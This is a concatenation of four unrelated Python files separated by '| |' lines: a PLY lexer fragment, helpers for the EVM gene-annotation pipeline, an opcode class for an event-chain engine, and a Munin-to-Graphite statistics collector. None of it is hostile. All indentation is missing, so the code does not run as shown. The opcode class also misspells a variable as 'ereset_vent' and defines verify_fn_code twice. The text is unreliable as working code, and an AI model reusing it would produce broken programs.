def t_GE(token):
r'>='
return token
def t_GT(token):
r'>'
return token
def t_FALSE(token):
r'false'
return token
def t_TRUE(token):
r'true'
return token
def t_IF(token):
r'if'
return token
def t_ELSE(token):
r'else'
return token
def t_VAR(token):
r'var'
return token
def t_FUNCTION(token):
r'function'
return token
def t_RETURN(token):
r'return'
return token
def t_IDENTIFIER(token):
r'[a-zA-Z][_a-zA-Z]*'
return token
def t_NUMBER(token):
r'-?[0-9]+\.?[0-9]*'
token.value = float(token.value)
return token
def t_STRING(token):
r'"(?:[^\\]|(?:\\.))*"'
token.value = token.value[1:-1]
return token
lexer = lex.lex()
def test_lexer(input_string):
lexer.input(input_string)
while True:
tok = lexer.token() # get the next token
if not tok:
break
else:
print tok
input1 = """ - ! && () * , / ; { || } + < <= = == > >= else false function if return true var"""
print test_lexer(input1)
input2 = """
if //else
=/*=*/=
true /* false
*/ return"""
print test_lexer(input2)
| |
#!/usr/bin/env python3
import os
import subprocess
import sys
from glob import glob
def convert_augustus(aug_file, wd):
"""
Converts augustus.gff to augustus.gff3 (from BRAKER1) using the EVM
script EVMUtils/misc/augustus_GTF_to_EVM_GFF3.pl which needs to be in PATH
:param aug_file:
:param wd:
:return:
"""
sys.stdout.write('###CONVERTING AUGUSTUS TO GFF3###\n')
args = ['augustus_GTF_to_EVM_GFF3.pl', aug_file]
#COMMANDS.append(' '.join(args))
out_file = aug_file + '3'
if os.path.isfile(out_file):
sys.stdout.write((
'Augustus GFF3 file existed already: ' +
out_file +
' --- skipping\n'))
return out_file
log_name = wd + '.augustus_GTF_to_EVM_GFF3.pl.log'
log = open(log_name, 'w')
out_f = open(out_file, 'w')
try:
subprocess.check_call(args, stdout=out_f, stderr=log)
# sys.stdout.write '> Augustus to GFF3 completed: ' + out_file
except:
# sys.stdout.write ' Augustus to GFF3 failed'
raise NameError('')
log.close()
out_f.close()
return out_file
def convert_genemark(genemark_file, wd):
"""
Converts genemark.gtf to genemark.gff3 (from BRAKER1) using gtf2gff3.pl,
which needs to be in PATH
:param genemark_file:
:param wd:
:return:
"""
sys.stdout.write('###CONVERTING GENEMARK TO GFF3###\n')
args = ['gtf2gff3.pl', genemark_file]
#COMMANDS.append(' '.join(args))
out_file = genemark_file + '.gff3'
if os.path.isfile(out_file):
sys.stdout.write((
'GeneMark GFF3 file existed already: ' +
out_file +
' --- skipping\n'))
return out_file
log_name = wd + '.genemark_GTF_to_EVM_GFF3.pl.log'
log = open(log_name, 'w')
out_f = open(out_file, 'w')
try:
subprocess.check_call(args, stdout=out_f, stderr=log)
# sys.stdout.write '> Genemark to GFF3 completed: ' + out_file + '\n'
except:
# sys.stdout.write ' Genemark to GFF3 failed'
raise NameError('')
log.close()
out_f.close()
return out_file
def move_single_file(filename, key, evm_dir, new_file_d):
"""
Moves a single file into the directory and appends the new path to the dictionary
:param filename:
:param key:
:param evm_dir:
:param new_file_d:
:return:
"""
args = ['cp', filename, evm_dir]
#COMMANDS.append(' '.join(args))
true_filename = filename.split('/')[-1]
out_file = evm_dir + true_filename
if os.path.isfile(out_file):
sys.stdout.write(('File in EVM_dir already: ' + out_file + ' --- skipping\n'))
new_file_d[key] = out_file
return new_file_d
try:
subprocess.check_call(args)
new_file_d[key] = out_file
return new_file_d
except:
# sys.stdout.write 'Could not move ' + filename
raise NameError('')
def braker_folder_find(location):
gff = [y for x in os.walk(location) for y in glob(os.path.join(x[0], "augustus.hints.gtf"))][0]
gtf = [y for x in os.walk(location) for y in glob(os.path.join(x[0], "genemark.gtf"))][0]
return gff, gtf
def move_cat_files(file_list, key, evm_dir, new_file_d):
"""
Moves and concatenate files to evm dir (case of GFF3 when using long
and short reads)
:param file_list:
:param key:
:param evm_dir:
:param new_file_d:
:return:
"""
args = ['cat'] + file_list
out_file = evm_dir + key + '.gff3'
if os.path.isfile(out_file):
sys.stdout.write(('File in EVM_dir already: ' + out_file + ' --- skipping\n'))
new_file_d[key] = out_file
return new_file_d
file_ = open(out_file, 'w')
try:
subprocess.check_call(args, stdout=file_)
new_file_d[key] = out_file
file_.close()
return new_file_d
except:
sys.stdout.write('Could not move ' + out_file)
raise NameError('')
def move_EVM_inputs(evm_dir, inputs):
"""
Takes a dictionary with files that are inputs for EVM and groups them in
the same directory
"""
sys.stdout.write('###MOVING IMPORTANT FILES###\n')
new_files = {}
for key, filename in list(inputs.items()):
if isinstance(filename, list): # FOR THE GFF3 alignment files in case of short & long reads
new_files = move_cat_files(filename, key, evm_dir, new_files)
else:
new_files = move_single_file(filename, key, evm_dir, new_files)
# sys.stdout.write '> EVM input dir full of files: ' + evm_dir
return new_files
def cat_EVM_inputs(evm_dir): # , inputs):
"""
Takes the files in EVM input directory and concatenates the needed
files to prepare the EVM command. Augustus, Genemark and Transdecoder
go into gene_predictions.gff3 and pasa asemblies and transcript
alignments go into transcripts.gff3
"""
# GENE PREDICTIONS
sys.stdout.write('###CONCATENATING FILES###\n')
# GENE PREDICTION
file_list = []
ab_initio_list = ['cat']
protein_list = []
transcript_list = []
list_soft = []
transcript_file = ''
protein_file = ''
for root, dirs, files in os.walk(evm_dir):
for name in files:
if 'augustus' in name:
ab_initio_list.append(os.path.join(root, name))
list_soft.append('augustus')
elif 'genemark' in name:
ab_initio_list.append(os.path.join(root, name))
list_soft.append('genemark')
elif 'PASA' in name or 'pasa' in name:
transcript_file = os.path.join(root, name)
transcript_list.append(os.path.join(root, name))
list_soft.append('pasa')
elif 'protein' in name:
protein_file = os.path.join(root, name)
protein_list.append(os.path.join(root, name))
list_soft.append('exonerate')
elif 'trinity' in name:
ab_initio_list.append(os.path.join(root, name))
list_soft.append('gmap')
elif 'external' in name:
ab_initio_list.append(os.path.join(root, name))
list_soft.append('external')
pred_filename = evm_dir + 'gene_predictions.gff3'
if os.path.isfile(pred_filename):
sys.stdout.write(('Gene predictions GFF3 file existed already: ' + pred_filename + ' --- skipping\n'))
else:
pred_file = open(pred_filename, 'w')
try:
subprocess.check_call(ab_initio_list, stdout=pred_file, cwd=evm_dir)
# sys.stdout.write '> Gene prediction concatenation completed'
except:
# sys.stdout.write 'Gene prediction concatenation failed'
raise NameError('')
pred_file.close()
return list_soft, pred_filename, transcript_file, protein_file
def group_EVM_inputs(evm_dir, inputs):
"""
Moves all the inputs to EVM directory and concatenates them
in the same file"""
# Move
move_EVM_inputs(evm_dir, inputs)
# Concatenate
list_soft, pred_file, transcript_file, protein_file = cat_EVM_inputs(evm_dir)
return list_soft, pred_file, transcript_file, protein_file
def evm_weight(evm_dir, weights_dic, evidences, pasa_name, gmap_name):
"""
Writes a weight file "weights.txt" on evm_dir
"""
w_filename = evm_dir + 'weights.txt'
list_match = []
evidence_dic = {'GeneMark.hmm': 'ABINITIO_PREDICTION', 'Augustus': 'ABINITIO_PREDICTION', 'exonerate': 'PROTEIN', pasa_name: 'TRANSCRIPT',
gmap_name: 'ABINITIO_PREDICTION', 'external': 'ABINITIO_PREDICTION'}
software_links = { 'genemark': 'GeneMark.hmm', 'augustus': 'Augustus', 'exonerate': 'exonerate', 'external': 'external', 'pasa': pasa_name,
'gmap': gmap_name}
for software in software_links:
if software in evidences:
list_match.append(software_links[software])
w_file = open(w_filename, 'w')
for present_soft in list_match:
if present_soft in evidence_dic:
w_file.write('\t'.join([evidence_dic[present_soft], present_soft, weights_dic[present_soft]]))
w_file.write('\n')
w_file.close()
return w_filename
if __name__ == '__main__':
#strand(*sys.argv[1:])
#exonerate(fasta, outputFilename, proc, gmap_wd, verbose) genename_evm(gff_filename, verbose, wd)
cat_EVM_inputs(*sys.argv[1:])
| |
import datetime
import time
class Opcodes():
def __init__(self):
self.opcodes = {}
self.opcodes["Terminate"] = self.terminate_code
self.opcodes["Reset"] = self.reset_code
self.opcodes["Halt"] = self.halt_code
self.opcodes["Enable_Chain"] = self.enable_chain_code
self.opcodes["Disable_Chain"] = self.disable_chain_code
self.opcodes["Suspend_Chain"] = self.suspend_chain_code
self.opcodes["Resume_Chain"] = self.resume_chain_code
self.opcodes["Log"] = self.log_code
self.opcodes["One_Step"] = self.one_step_code
self.opcodes["Send_Event"] = self.send_event_code
self.opcodes["Check_Event"] = self.check_event_code
self.opcodes["Code"] = self.code_code
self.opcodes["Wait_Tod"] = self.wait_tod_code
self.opcodes["Wait_Tod_GE"] = self.wait_tod_ge_code
self.opcodes["Wait_Tod_LE"] = self.wait_tod_le_code
self.opcodes["Wait_Event_Count"] = self.wait_event_count_code
self.opcodes["Wait_Fn"] = self.wait_fn_code
self.opcodes["Verify_Tod"] = self.verify_tod_code
self.opcodes["Verify_Tod_GE"] = self.verify_tod_ge_code
self.opcodes["Verify_Tod_LE"] = self.verify_tod_le_code
self.opcodes["Verify_Not_Event_Count"] = self.verify_not_event_count_code
self.opcodes["Verify_Fn"] = self.verify_fn_code
self.opcodes["Assert_Tod"] = self.assert_tod_code
self.opcodes["Assert_Tod_GE"] = self.assert_tod_ge_code
self.opcodes["Assert_Tod_LE"] = self.assert_tod_le_code
self.opcodes["Assert_Not_Event_Count"] = self.assert_not_event_count_code
self.opcodes["Assert_Fn"] = self.assert_fn_code
def get_opcode(self, opcode_name):
return self.opcodes[opcode_name]
def add_opcode(self, name, code):
self.opcodes[name] = code
def terminate_code(self, cf_handle, chainObj, parameters, event):
return "TERMINATE"
def reset_code(self, cf_handle, chainObj, parameters, event):
return "RESET"
def halt_code(self, cf_handle, chainObj, parameters, event):
return "HALT"
def enable_chain_code(self, cf_handle, chainObj, parameters, event):
chains = parameters[0]
for j in chains:
cf_handle.enable_chain_base(j)
return "DISABLE"
def disable_chain_code(self, cf_handle, chainObj, parameters, event):
chains = parameters[0]
for j in chains:
cf_handle.disable_chain_base(j)
return "DISABLE"
def resume_chain_code(self, cf_handle, chainObj, parameters, event):
chains = parameters[0]
for j in chains:
cf_handle.resume_chain_code(j)
return "DISABLE"
def suspend_chain_code(self, cf_handle, chainObj, parameters, event):
chains = parameters[0]
for j in chains:
cf_handle.suspend_chain_code(j)
return "DISABLE"
def log_code(self, cf_handle, chainObj, parameters, event):
if event["name"] == "INIT":
print("Log ---",time.time(), parameters[0])
return "DISABLE"
def one_step_code(self, cf_handle, chainObj, parameters, event):
if event["name"] != "INIT":
func = parameters[0]
func(cf_handle, chainObj, parameters, event)
return "DISABLE"
def send_event_code(self, cf_handle, chainObj, parameters, event):
# print "send event ",parameters[0]
event_name = parameters[0]
if len(parameters) > 1:
event_data = parameters[1]
else:
event_data = None
event = {}
event["name"] = event_name
event["data"] = event_data
cf_handle.event_queue.append(event)
return "DISABLE"
def check_event_code(self, cf_handle, chainObj, parameters, event):
if event["name"] == "INIT":
func = parameters[1]
func(cf_handle, chainObj, parameters, event)
elif event["name"] == parameters[0]:
func = parameters[1]
func(cf_handle, chainObj, parameters, event)
return "CONTINUE"
def code_code(self, cf_handle, chainObj, parameters, event):
return_value = parameters[0](cf_handle, chainObj, parameters, event)
# print "return_value%%%%%%%%%%%%%%%%%%%%%%", return_value
return return_value
def wait_event_count_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
if event["name"] == "INIT":
parameters.append(0)
else:
if event["name"] == parameters[0]:
parameters[-1] = parameters[-1] + 1
if parameters[-1] >= int(parameters[1]):
returnValue = "DISABLE"
return returnValue
def wait_tod_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == time_stamp.weekday()) or
(dow == "*")) == False:
return returnValue
if ((hour == time_stamp.hour) or
(hour == "*")) == False:
return returnValue
if ((minute == time_stamp.minute) or
(minute == "*")) == False:
return returnValue
if ((second == time_stamp.second) or
(second == "*")) == False:
return returnValue
return "DISABLE"
def wait_tod_le_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow >= time_stamp.weekday())) == False:
return returnValue
if ((hour == "*") or
(hour >= time_stamp.hour)) == False:
return returnValue
if ((minute == "*") or
(minute >= time_stamp.minute)) == False:
return returnValue
if ((second == "*") or
(second >= time_stamp.second)) == False:
return returnValue
return "DISABLE"
def wait_tod_ge_code(self, cf_handle, chainObj, parameters, event):
returnValue = "HALT"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow <= time_stamp.weekday())) == False:
return returnValue
if ((hour == "*") or
(hour <= time_stamp.hour)) == False:
return returnValue
if ((minute == "*") or
(minute <= time_stamp.minute)) == False:
return returnValue
if ((second == "*") or
(second <= time_stamp.second)) == False:
return returnValue
return "DISABLE"
def wait_fn_code(self, cf_handle, chainObj, parameters, event):
waitFn = parameters[0]
if waitFn(cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
else:
returnValue = "HALT"
return returnValue
def verify_return_code( self, cf_handle, reset_event, reset_flag ):
if reset_event[0] != None:
event = {}
event["name"] = reset_event[0]
event["data"] = reset_event[1]
cf_handle.event_queue.append(event)
if reset_flag == True:
return_value = "RESET"
else:
return_value = "TERMINATE"
return return_value
def verify_fn_code(self, cf_handle, chainObj, parameters, event):
reset_event = parameters[1]
reset_flag = parameters[2]
verifyFn = parameters[0]
if verifyFn (cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
else:
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def verify_not_event_count_code(self, cf_handle, chainObj, parameters, event):
reset_flag = parameters[3]
reset_event = parameters[2]
returnValue = "CONTINUE"
if event["name"] == "INIT":
parameters.append(0)
else:
if event["name"] == parameters[0]:
parameters[-1] = parameters[-1] + 1
if parameters[-1] >= int(parameters[1]):
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def verify_tod_code(self, cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == time_stamp.weekday()) or
(dow == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == time_stamp.hour) or
(hour == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == time_stamp.minute) or
(minute == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == time_stamp.second) or
(second == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def verify_tod_le_code(self, cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow >= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour >= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute >= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == "*") or
(second >= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def verify_tod_ge_code(self, cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow <= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour <= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute <= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, ereset_vent, reset_flag)
if ((second == "*") or
(second <= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def verify_fn_code(self, cf_handle, chainObj, parameters, event):
reset_event = parameters[1]
reset_flag = parameters[2]
verifyFn = parameters[0]
if verifyFn (cf_handle, chainObj, parameters, event):
returnValue = "CONTINUE"
else:
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def assert_not_event_count_code(self, cf_handle, chainObj, parameters, event):
reset_flag = parameters[3]
reset_event = parameters[2]
returnValue = "DISABLE"
if event["name"] == "INIT":
parameters.append(0)
else:
if event["name"] == parameters[0]:
parameters[-1] = parameters[-1] + 1
if parameters[-1] >= int(parameters[1]):
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def assert_tod_code(self, cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == time_stamp.weekday()) or
(dow == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == time_stamp.hour) or
(hour == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == time_stamp.minute) or
(minute == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == time_stamp.second) or
(second == "*")) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def assert_tod_le_code(self, cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow >= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour >= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute >= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((second == "*") or
(second >= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def assert_tod_ge_code(self, cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
dow = parameters[0]
hour = parameters[1]
minute = parameters[2]
second = parameters[3]
reset_event = parameters[4]
reset_flag = parameters[5]
#
# prevent excessive calculations
if event["name"] != "TIME_TICK":
return returnValue
time_stamp = datetime.datetime.today()
if ((dow == "*") or
(dow <= time_stamp.weekday())) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((hour == "*") or
(hour <= time_stamp.hour)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
if ((minute == "*") or
(minute <= time_stamp.minute)) == False:
return self.verify_return_code( cf_handle, ereset_vent, reset_flag)
if ((second == "*") or
(second <= time_stamp.second)) == False:
return self.verify_return_code( cf_handle, reset_event, reset_flag)
return "CONTINUE"
def assert_fn_code(self, cf_handle, chainObj, parameters, event):
reset_event = parameters[1]
reset_flag = parameters[2]
verifyFn = parameters[0]
if verifyFn (cf_handle, chainObj, parameters, event):
returnValue = "DISABLE"
else:
returnValue = self.verify_return_code( cf_handle, reset_event, reset_flag)
return returnValue
def test_for_duplicate_functions(self):
function_set = set()
for i , item in self.opcodes.items():
if item == None:
raise ValueError("function is not defined opcode "+i)
if item in function_set:
raise ValueError("duplicate opcode functions opcode "+i)
function_set.add(item)
if __name__ == "__main__":
print("test core opcodes")
opcodes = Opcodes()
opcodes.test_for_duplicate_functions()
print("test is done")
| |
#!/usr/bin/python
"""Gather Munin statistics and deliver to Carbon for Graphite display."""
import argparse
import ConfigParser
import logging
import logging.handlers
import pickle
import re
import socket
import struct
import sys
import time
import signal
import threading
RE_LEFTRIGHT = re.compile(r"^(?P<left>\S+)\s+(?P<right>\S+)$")
RE_MUNIN_NODE_NAME = re.compile(r"^# munin node at\s+(?P<nodename>\S+)$")
threads = []
shutdown = False
class Munin():
"""Munin host object with querying getter functions."""
def __init__(self, hostname, thread, port=4949, args=None):
self.hostname = None
self.remotenode = None
self._sock = None
self._conn = None
self._carbon_sock = None
self.hello_string = None
self.reload_plugins = True
self.plugins = {}
self.plugins_config = {}
if ':' in hostname:
self.hostname, self.remotenode = hostname.split(":", 1)
else:
self.hostname = hostname
self.port = port
self.args = args
if self.args.displayname:
self.displayname = self.args.displayname.split(".")[0]
else:
self.displayname = self.hostname.split(".")[0]
self.thread = thread
def go(self):
"""Bootstrap method to start processing hosts's Munin stats."""
global shutdown
self.connect()
self.update_hostname()
processing_time = self.process_host_stats()
interval = int(self.args.interval)
while True and interval != 0 and not shutdown:
sleep_time = max(interval - processing_time, 0)
time.sleep(sleep_time)
self.connect()
processing_time = self.process_host_stats()
def update_hostname(self):
"""Updating hostname from connection hello string."""
if self.args.displayname:
return
try:
node_name = RE_MUNIN_NODE_NAME.search(self.hello_string).group(1)
self.displayname = node_name.split(".")[0]
except AttributeError:
logger.info("Thread %s: Unable to obtain munin node name from: %s",
self.thread.name, self.hello_string)
return
def connect(self):
"""Initial connection to Munin host."""
try:
self._sock = socket.create_connection((self.hostname, self.port), 10)
except socket.error:
logger.exception("Thread %s: Unable to connect to Munin host %s, port: %s",
self.thread.name, self.hostname, self.port)
sys.exit(1)
try:
self._conn = self._sock.makefile()
self.hello_string = self._readline()
except socket.error:
logger.exception("Thread %s: Unable to communicate to Munin host %s, port: %s",
self.thread.name, self.hostname, self.port)
if self.args.carbon:
self.connect_carbon()
def connect_carbon(self):
carbon_host, carbon_port = self.args.carbon.split(":")
try:
self._carbon_sock = socket.create_connection((carbon_host, carbon_port), 10)
except socket.error:
logger.exception("Thread %s: Unable to connect to Carbon on host %s, port: %s",
self.thread.name, carbon_host, carbon_port)
sys.exit(1)
def close_connection(self):
"""Close connection to Munin host."""
self._sock.close()
def close_carbon_connection(self):
"""Close connection to Carbon host."""
if self._carbon_sock:
self._carbon_sock.close()
def _readline(self):
"""Read one line from Munin output, stripping leading/trailing chars."""
return self._conn.readline().strip()
def _iterline(self):
"""Iterator over Munin output."""
while True:
current_line = self._readline()
logger.debug("Thread %s: Iterating over line: %s", self.thread.name, current_line)
if not current_line:
break
if current_line.startswith("#"):
continue
if current_line == ".":
break
yield current_line
def fetch(self, plugin):
"""Fetch plugin's data fields from Munin."""
self._sock.sendall("fetch %s\n" % plugin)
response = {None: {}}
multigraph = None
multigraph_prefix = ""
for current_line in self._iterline():
if current_line.startswith("multigraph "):
multigraph = current_line[11:]
multigraph_prefix = multigraph.rstrip(".") + "."
response[multigraph] = {}
continue
# Some munin plugins have more than one space between key and value.
try:
full_key_name, key_value = RE_LEFTRIGHT.search(current_line).group(1, 2)
key_name = multigraph_prefix + full_key_name.split(".")[0]
response[multigraph][key_name] = key_value
except (KeyError, AttributeError):
logger.info("Thread %s: Plugin %s returned invalid data [%s] for host"
" %s\n", self.thread.name, plugin, current_line, self.hostname)
return response
def list_plugins(self):
"""Return a list of Munin plugins configured on a node. """
self._sock.sendall("cap multigraph\n")
self._readline() # ignore response
if self.remotenode:
logger.info("Thread %s: Asking for plugin list for remote node %s", self.thread.name, self.remotenode)
self._sock.sendall("list %s\n" % self.remotenode)
else:
logger.info("Thread %s: Asking for plugin list for local node %s", self.thread.name, self.hostname)
self._sock.sendall("list\n")
plugin_list = self._readline().split(" ")
if self.args.filter:
try:
filteredlist = [plugin for plugin in plugin_list if re.search(self.args.filter, plugin, re.IGNORECASE)]
plugin_list = filteredlist
except re.error:
logger.info("Thread %s: Filter regexp for plugin list is not valid: %s" % self.args.filter)
# if there is no filter or we have got an re.error, simply return full list
result_list = []
for plugin in plugin_list:
if len(plugin.strip()) > 0:
result_list.append(plugin)
return result_list
def get_config(self, plugin):
"""Get config values for Munin plugin."""
self._sock.sendall("config %s\n" % plugin)
response = {None: {}}
multigraph = None
for current_line in self._iterline():
if current_line.startswith("multigraph "):
multigraph = current_line[11:]
response[multigraph] = {}
continue
try:
key_name, key_value = current_line.split(" ", 1)
except ValueError:
# ignore broken plugins that don't return a value at all
continue
if "." in key_name:
# Some keys have periods in them.
# If so, make their own nested dictionary.
key_root, key_leaf = key_name.split(".", 1)
if key_root not in response:
response[multigraph][key_root] = {}
response[multigraph][key_root][key_leaf] = key_value
else:
response[multigraph][key_name] = key_value
return response
def process_host_stats(self):
"""Process Munin node data, potentially sending to Carbon."""
start_timestamp = time.time()
logger.info("Thread %s: Querying host %s", self.thread.name, self.hostname)
# to be more efficient, load list of plugins just in case we do not have any
if self.reload_plugins:
self.plugins_config = {}
self.plugins = self.list_plugins()
self.reload_plugins = False
logger.debug("Thread %s: Plugin List: %s", self.thread.name, self.plugins)
epoch_timestamp = int(start_timestamp)
for current_plugin in self.plugins:
logger.info("Thread %s: Fetching plugin: %s (Host: %s)",
self.thread.name, current_plugin, self.hostname)
# after (re)load of list of plugins we have to load their configurations too
try:
self.plugins_config[current_plugin]
except KeyError:
self.plugins_config[current_plugin] = self.get_config(current_plugin)
logger.debug("Thread %s: Plugin Config: %s", self.thread.name, self.plugins_config[current_plugin])
plugin_data = self.fetch(current_plugin)
logger.debug("Thread %s: Plugin Data: %s", self.thread.name, plugin_data)
if self.args.carbon:
for multigraph in self.plugins_config[current_plugin]:
try:
self.send_to_carbon(epoch_timestamp,
current_plugin,
self.plugins_config[current_plugin][multigraph],
plugin_data[multigraph])
except KeyError:
logger.info("Thread %s: Plugin returns invalid data:\n plugin_config: %r host %s.",
self.thread.name, self.plugins_config[current_plugin], self.hostname)
end_timestamp = time.time() - start_timestamp
self.close_connection()
self.close_carbon_connection()
logger.info("Thread %s: Finished querying host %s (Execution Time: %.2f sec).",
self.thread.name, self.hostname, end_timestamp)
return end_timestamp
def send_to_carbon(self, timestamp, plugin_name, plugin_config, plugin_data):
"""Send plugin data to Carbon over Pickle format."""
if self.args.noprefix:
prefix = ''
else:
prefix = "%s." % self.args.prefix
hostname = self.hostname
if self.remotenode:
hostname = self.remotenode
data_list = []
logger.info("Creating metric for plugin %s, timestamp: %d",
plugin_name, timestamp)
for data_key in plugin_data:
try:
plugin_category = plugin_config["graph_category"]
metric = "%s%s.%s.%s.%s" % (prefix, self.displayname, plugin_category, plugin_name, data_key)
value = plugin_data[data_key]
logger.debug("Creating metric %s, value: %s", metric, value)
data_list.append((metric, (timestamp, value)))
except KeyError:
logger.info("plugin returns invalid data:\n plugin_config: %r host %s.", plugin_config, self.hostname)
if self.args.noop:
logger.info("NOOP: Not sending data to Carbon")
return
logger.info("Sending plugin %s data to Carbon for host %s.",
plugin_name, hostname)
payload = pickle.dumps(data_list)
header = struct.pack("!L", len(payload))
message = header + payload
try:
self._carbon_sock.sendall(message)
logger.info("Finished sending plugin %s data to Carbon for host %s.",
plugin_name, self.hostname)
except socket.error:
logger.exception("Unable to send data to Carbon")
###
# Custom Threading class, one thread for each host in configuration
###
class MuninThread(threading.Thread):
def __init__(self, params, cmdlineargs):
threading.Thread.__init__(self)
self.name = params['host']
self.shutdown = False
# construct new namespace to pass it to the new Munin class instance
# for better manipulation, just prepare writable dcfg "link" to new namespace
cfg = argparse.Namespace()
dcfg = vars(cfg)
#construct final arguments Namespace
for v in vars(cmdlineargs):
try:
dcfg[v] = params[v]
except KeyError:
dcfg[v] = getattr(cmdlineargs, v, None)
self.munin = Munin(hostname=self.name, args=cfg, thread=self)
def run(self):
logger.info("Starting thread for %s." % self.name)
self.munin.go()
logger.info("Finishing thread for %s." % self.name)
def dostop(self):
global shutdown
logger.info("Thread %s: Got signal to stop." % self.name)
shutdown = True
def reload(self):
self.munin.reload_plugins = True
logger.info("Thread %s: Got signal to reload." % self.name)
###
# bellow are common function
###
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description="Send Munin statistics to Graphite.")
parser.add_argument("--config", "-c",
action="store",
default=False,
help="Configuration file with list of hosts and their plugins to fetch.")
parser.add_argument("--host",
action="store",
default="localhost",
help="Munin host to query for stats. You can specify indirect node after ':', "
"i.e. --host localhost:remotenode. Default: %(default)s")
parser.add_argument("--displayname",
default=False,
help="If defined, use this as the name to store metrics in Graphite instead of the Munin"
" hostname.")
parser.add_argument("--carbon",
action="store",
help="Carbon host and Pickle port (ex: localhost:2004).")
parser.add_argument("--filter",
action="store",
default='.*',
help="Regular expression for selecting only defined subset of received plugins.")
parser.add_argument("--interval",
type=int,
default=60,
help="Interval (seconds) between polling Munin host for statistics. If set to 0, exit after "
"polling once. Default: %(default)s")
parser.add_argument("--noop",
action="store_true",
help="Don't actually send Munin data to Carbon. Default: %(default)s")
parser.add_argument("--noprefix",
action="store_true",
default=False,
help="Do not use a prefix on graphite target's name. Default: %(default)s")
parser.add_argument("--prefix",
action="store",
default="servers",
help="Prefix used on graphite target's name. Default: %(default)s")
parser.add_argument("--logtosyslog",
action="store_true",
help="Log to syslog. No output on the command line.")
parser.add_argument("--verbose", "-v",
choices=[1, 2, 3],
default=2,
type=int,
help="Verbosity level. 1:ERROR, 2:INFO, 3:DEBUG. Default: %(default)d")
args = parser.parse_args()
return args
###
# stop all threads and exit
###
def handler_term(signum=signal.SIGTERM, frame=None):
global threads
for t in threads:
t.dostop()
###
# set all threads to reload information about all munin-node's plugins
###
